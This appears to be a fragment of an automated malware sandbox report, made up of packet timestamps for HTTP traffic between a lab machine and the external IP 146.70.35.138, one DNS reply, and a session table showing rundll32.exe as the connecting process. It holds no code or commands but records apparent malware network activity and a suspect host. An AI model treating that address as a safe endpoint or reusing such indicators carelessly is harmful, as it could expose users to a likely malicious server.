Apr 22, 2022 15:33:01.483587980 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.483628988 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.483650923 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.483661890 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.483669043 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.483694077 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.483716011 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.483760118 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.522916079 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.522953033 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.522975922 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.522991896 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.523010969 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.523058891 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.523112059 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.523135900 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.523159027 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.523159981 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.523176908 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.523186922 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.523220062 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.523382902 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.523410082 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.523432970 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.523437977 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.523451090 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.523471117 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.523859024 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.523888111 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.523910999 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.523922920 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.523935080 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.523951054 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.523966074 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.523974895 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.523996115 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.524019003 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.524027109 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.524035931 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.524086952 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.524112940 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.524359941 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.524394035 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.524420023 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.524434090 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.524436951 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.524460077 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.524463892 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.524483919 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.524507046 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.524516106 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.524522066 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.524559021 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.524627924 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.524678946 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.649951935 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.673763990 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:02.024689913 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:02.024761915 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:02.024888992 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:34:04.883241892 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 22, 2022 15:32:39.516962051 CEST | 8.8.8.8 | 192.168.2.3 | 0x1381 | No error (0) | 13.107.43.16 | A (IP address) | IN (0x0001) |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49746 | 146.70.35.138 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 22, 2022 15:32:59.896476030 CEST | 660 | OUT | |
Apr 22, 2022 15:33:00.272408009 CEST | 662 | IN |